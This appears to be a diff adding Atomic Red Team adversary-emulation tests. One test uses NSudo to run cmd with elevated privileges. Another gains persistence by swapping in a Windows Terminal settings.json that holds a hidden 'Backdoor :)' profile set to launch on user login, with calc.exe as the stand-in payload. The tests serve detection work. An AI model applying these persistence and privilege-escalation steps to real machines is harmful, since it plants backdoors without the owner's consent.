+      NSudo.bat must exist in the specified path #{nsudo_path}
+    prereq_command: |
+      if (Test-Path #{nsudo_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile $env:TEMP\NSudo_8.2_All_Components.zip "https://github.com/M2Team/NSudo/releases/download/8.2/NSudo_8.2_All_Components.zip"
+      Expand-Archive -Path $env:TEMP\NSudo_8.2_All_Components.zip -DestinationPath $env:TEMP\NSudo_8.2_All_Components -Force
+      Rename-Item "$env:TEMP\NSudo_8.2_All_Components\NSudo Launcher" $env:TEMP\NSudo_8.2_All_Components\NSudo_Launcher
+      Remove-Item $env:TEMP\NSudo_8.2_All_Components.zip -Recurse -ErrorAction Ignore
+  executor:
+    command: |
+     Start-Process #{nsudo_path} -Argument "-U:T -P:E cmd"
+     Start-Sleep -Second 5
+     Stop-Process -Name "cmd" -force -erroraction silentlycontinue
+    name: powershell
@@ -0,0 +1,68 @@
+# T1547.015 - Login Items
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1547/015)
+<blockquote>Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call <code>SMLoginItemSetEnabled</code>.
+
+Login items installed using the Service Management Framework leverage <code>launchd</code>, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.
+
+Adversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as <code>tell application “System Events” to make login item at end with properties /path/to/executable</code>.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in <code>~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm</code>.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Persistence by modifying Windows Terminal profile](#atomic-test-1---persistence-by-modifying-windows-terminal-profile)
+
+
+<br/>
+
+## Atomic Test #1 - Persistence by modifying Windows Terminal profile
+Modify Windows Terminal settings.json file to gain persistence. [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ec5d76ef-82fe-48da-b931-bdb25a62bc65
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| calculator | Test program used to imitate a maliciously called program. | String | calculator.exe|
+| settings_json_def | Default file for Windows Terminal to replace the default profile with a backdoor to call another program. | Path | ~&#92;AppData&#92;Local&#92;Packages&#92;Microsoft.WindowsTerminal_8wekyb3d8bbwe&#92;LocalState&#92;settings.json|
+| settings_json_tmp | Temp file for Windows Terminal. | Path | ~&#92;AppData&#92;Local&#92;Temp&#92;settings.json|
+| wt_exe | Windows Terminal executable. | Path | ~&#92;AppData&#92;Local&#92;Microsoft&#92;WindowsApps&#92;Microsoft.WindowsTerminal_8wekyb3d8bbwe&#92;wt.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+mv #{settings_json_def} #{settings_json_tmp}
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
+wt.exe
+```
+
+#### Cleanup Commands:
+```powershell
+mv -Force #{settings_json_tmp} #{settings_json_def}
+taskkill /F /IM "#{calculator}" > $null
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Windows Terminal must be installed
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+$(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
+```
+
+
+
+
+<br/>
@@ -0,0 +1,42 @@
+attack_technique: T1547.015
+display_name: 'Boot or Logon Autostart Execution: Login Items'
+atomic_tests:
+- name: Persistence by modifying Windows Terminal profile
+  auto_generated_guid: ec5d76ef-82fe-48da-b931-bdb25a62bc65
+  description: Modify Windows Terminal settings.json file to gain persistence. [Twitter Post](https://twitter.com/nas_bench/status/1550836225652686848)
+  supported_platforms:
+  - windows
+  input_arguments:
+    calculator:
+      description: Test program used to imitate a maliciously called program.
+      type: String
+      default: calculator.exe
+    settings_json_def:
+      description: Default file for Windows Terminal to replace the default profile with a backdoor to call another program.
+      type: Path
+      default: ~\AppData\Local\Packages\Microsoft.WindowsTerminal_8wekyb3d8bbwe\LocalState\settings.json
+    settings_json_tmp:
+      description: Temp file for Windows Terminal.
+      type: Path
+      default: ~\AppData\Local\Temp\settings.json
+    wt_exe:
+      description: Windows Terminal executable.
+      type: Path
+      default: ~\AppData\Local\Microsoft\WindowsApps\Microsoft.WindowsTerminal_8wekyb3d8bbwe\wt.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Windows Terminal must be installed
+    prereq_command: |
+      if (Test-Path #{wt_exe}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      $(rm ~\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\LocalState\StoreEdgeFD\installed.db -ErrorAction Ignore; Write-Output ""; $?) -and $(winget install --id=Microsoft.WindowsTerminal)
+  executor:
+    command: |
+      mv #{settings_json_def} #{settings_json_tmp}
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/src/settings.json?raw=true" -OutFile "#{settings_json_def}"
+      wt.exe
+    cleanup_command: |
+      mv -Force #{settings_json_tmp} #{settings_json_def}
+      taskkill /F /IM "#{calculator}" > $null
+    name: powershell
@@ -0,0 +1,278 @@
+{
+    "$help": "https://aka.ms/terminal-documentation",
+    "$schema": "https://aka.ms/terminal-profiles-schema",
+    "actions": 
+    [
+        {
+            "command": "paste",
+            "keys": "ctrl+v"
+        },
+        {
+            "command": 
+            {
+                "action": "copy",
+                "singleLine": false
+            },
+            "keys": "ctrl+c"
+        },
+        {
+            "command": "find",
+            "keys": "ctrl+shift+f"
+        },
+        {
+            "command": 
+            {
+                "action": "splitPane",
+                "split": "auto",
+                "splitMode": "duplicate"
+            },
+            "keys": "alt+shift+d"
+        }
+    ],
+    "copyFormatting": "none",
+    "copyOnSelect": false,
+	"defaultProfile": "{aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa}",
+    "profiles": 
+    {
+        "defaults": {},
+		"startonUserLogin": true,
+        "list": 
+        [
+            {
+                "commandline": "%SystemRoot%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+                "guid": "{61c54bbd-c2c6-5271-96e7-009a87ff44bf}",
+                "hidden": false,
+                "name": "Windows PowerShell"
+            },
+            {
+                "commandline": "%SystemRoot%\\System32\\cmd.exe",
+                "guid": "{0caa0dad-35be-5f56-a8ff-afceeeaa6101}",
+                "hidden": false,
+                "name": "Command Prompt"
+            },
+            {
+                "guid": "{b453ae62-4e3d-5e58-b989-0a998ec441b8}",
+                "hidden": false,
+                "name": "Azure Cloud Shell",
+                "source": "Windows.Terminal.Azure"
+            },
+			{
+				"closeOnExit": "graceful",
+				"commandline": "%SystemRoot%\\System32\\calc.exe",
+                "guid": "{aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa}",
+                "hidden": true,
+                "name": "Backdoor :)"
+            }
+        ]
+    },
+    "schemes": 
+    [
+        {
+            "background": "#0C0C0C",
+            "black": "#0C0C0C",
+            "blue": "#0037DA",
+            "brightBlack": "#767676",
+            "brightBlue": "#3B78FF",
+            "brightCyan": "#61D6D6",
+            "brightGreen": "#16C60C",
+            "brightPurple": "#B4009E",
+            "brightRed": "#E74856",
+            "brightWhite": "#F2F2F2",
+            "brightYellow": "#F9F1A5",
+            "cursorColor": "#FFFFFF",
+            "cyan": "#3A96DD",
+            "foreground": "#CCCCCC",
+            "green": "#13A10E",
+            "name": "Campbell",
+            "purple": "#881798",
+            "red": "#C50F1F",
+            "selectionBackground": "#FFFFFF",
+            "white": "#CCCCCC",
+            "yellow": "#C19C00"
+        },
+        {
+            "background": "#012456",
+            "black": "#0C0C0C",
+            "blue": "#0037DA",
+            "brightBlack": "#767676",
+            "brightBlue": "#3B78FF",
+            "brightCyan": "#61D6D6",
+            "brightGreen": "#16C60C",
+            "brightPurple": "#B4009E",
+            "brightRed": "#E74856",
+            "brightWhite": "#F2F2F2",
+            "brightYellow": "#F9F1A5",
+            "cursorColor": "#FFFFFF",
+            "cyan": "#3A96DD",
+            "foreground": "#CCCCCC",
+            "green": "#13A10E",
+            "name": "Campbell Powershell",
+            "purple": "#881798",
+            "red": "#C50F1F",
+            "selectionBackground": "#FFFFFF",
+            "white": "#CCCCCC",
+            "yellow": "#C19C00"
+        },
+        {
+            "background": "#282C34",
+            "black": "#282C34",
+            "blue": "#61AFEF",
+            "brightBlack": "#5A6374",
+            "brightBlue": "#61AFEF",
+            "brightCyan": "#56B6C2",
+            "brightGreen": "#98C379",
+            "brightPurple": "#C678DD",
+            "brightRed": "#E06C75",
+            "brightWhite": "#DCDFE4",
+            "brightYellow": "#E5C07B",
+            "cursorColor": "#FFFFFF",
+            "cyan": "#56B6C2",
+            "foreground": "#DCDFE4",
+            "green": "#98C379",
+            "name": "One Half Dark",
+            "purple": "#C678DD",
+            "red": "#E06C75",
+            "selectionBackground": "#FFFFFF",
+            "white": "#DCDFE4",
+            "yellow": "#E5C07B"
+        },
+        {
+            "background": "#FAFAFA",
+            "black": "#383A42",
+            "blue": "#0184BC",
+            "brightBlack": "#4F525D",
+            "brightBlue": "#61AFEF",
+            "brightCyan": "#56B5C1",
+            "brightGreen": "#98C379",
+            "brightPurple": "#C577DD",
+            "brightRed": "#DF6C75",
+            "brightWhite": "#FFFFFF",
+            "brightYellow": "#E4C07A",
+            "cursorColor": "#4F525D",
+            "cyan": "#0997B3",
+            "foreground": "#383A42",
+            "green": "#50A14F",
+            "name": "One Half Light",
+            "purple": "#A626A4",
+            "red": "#E45649",
+            "selectionBackground": "#FFFFFF",
+            "white": "#FAFAFA",
+            "yellow": "#C18301"
+        },
+        {
+            "background": "#002B36",
+            "black": "#002B36",
+            "blue": "#268BD2",
+            "brightBlack": "#073642",
+            "brightBlue": "#839496",
+            "brightCyan": "#93A1A1",
+            "brightGreen": "#586E75",
+            "brightPurple": "#6C71C4",
+            "brightRed": "#CB4B16",
+            "brightWhite": "#FDF6E3",
+            "brightYellow": "#657B83",
+            "cursorColor": "#FFFFFF",
+            "cyan": "#2AA198",
+            "foreground": "#839496",
+            "green": "#859900",
+            "name": "Solarized Dark",
+            "purple": "#D33682",
+            "red": "#DC322F",
+            "selectionBackground": "#FFFFFF",
+            "white": "#EEE8D5",
+            "yellow": "#B58900"
+        },
+        {
+            "background": "#FDF6E3",
+            "black": "#002B36",
+            "blue": "#268BD2",
+            "brightBlack": "#073642",
+            "brightBlue": "#839496",
+            "brightCyan": "#93A1A1",
+            "brightGreen": "#586E75",
+            "brightPurple": "#6C71C4",
+            "brightRed": "#CB4B16",
+            "brightWhite": "#FDF6E3",
+            "brightYellow": "#657B83",
+            "cursorColor": "#002B36",
+            "cyan": "#2AA198",
+            "foreground": "#657B83",
+            "green": "#859900",
+            "name": "Solarized Light",
+            "purple": "#D33682",
+            "red": "#DC322F",
+            "selectionBackground": "#FFFFFF",
+            "white": "#EEE8D5",
+            "yellow": "#B58900"
+        },
+        {
+            "background": "#000000",
+            "black": "#000000",
+            "blue": "#3465A4",
+            "brightBlack": "#555753",
+            "brightBlue": "#729FCF",
+            "brightCyan": "#34E2E2",
+            "brightGreen": "#8AE234",
+            "brightPurple": "#AD7FA8",
+            "brightRed": "#EF2929",
+            "brightWhite": "#EEEEEC",
+            "brightYellow": "#FCE94F",
+            "cursorColor": "#FFFFFF",
+            "cyan": "#06989A",
+            "foreground": "#D3D7CF",
+            "green": "#4E9A06",
+            "name": "Tango Dark",
+            "purple": "#75507B",
+            "red": "#CC0000",
+            "selectionBackground": "#FFFFFF",
+            "white": "#D3D7CF",
+            "yellow": "#C4A000"
+        },
+        {
+            "background": "#FFFFFF",
+            "black": "#000000",
+            "blue": "#3465A4",
+            "brightBlack": "#555753",
+            "brightBlue": "#729FCF",
+            "brightCyan": "#34E2E2",
+            "brightGreen": "#8AE234",
+            "brightPurple": "#AD7FA8",
+            "brightRed": "#EF2929",
+            "brightWhite": "#EEEEEC",
+            "brightYellow": "#FCE94F",
+            "cursorColor": "#000000",
+            "cyan": "#06989A",
+            "foreground": "#555753",
+            "green": "#4E9A06",
+            "name": "Tango Light",
+            "purple": "#75507B",
+            "red": "#CC0000",
+            "selectionBackground": "#FFFFFF",
+            "white": "#D3D7CF",
+            "yellow": "#C4A000"
+        },
+        {
+            "background": "#000000",
+            "black": "#000000",
+            "blue": "#000080",
+            "brightBlack": "#808080",
+            "brightBlue": "#0000FF",
+            "brightCyan": "#00FFFF",
+            "brightGreen": "#00FF00",
+            "brightPurple": "#FF00FF",
+            "brightRed": "#FF0000",
+            "brightWhite": "#FFFFFF",
+            "brightYellow": "#FFFF00",
+            "cursorColor": "#FFFFFF",
+            "cyan": "#008080",
+            "foreground": "#C0C0C0",
+            "green": "#008000",
+            "name": "Vintage",
+            "purple": "#800080",
+            "red": "#800000",
+            "selectionBackground": "#FFFFFF",
+            "white": "#C0C0C0",
+            "yellow": "#808000"
+        }
+    ]
+}
@@ -1127,3 +1127,5 @@ dda6fc7b-c9a6-4c18-b98d-95ec6542af6d
 034fe21c-3186-49dd-8d5d-128b35f181c7
 bdc373c5-e9cf-4563-8a7b-a9ba720a90f3
 ee363e53-b083-4230-aff3-f8d955f2d5bb
+ec5d76ef-82fe-48da-b931-bdb25a62bc65
+7be1bc0f-d8e5-4345-9333-f5f67d742cb9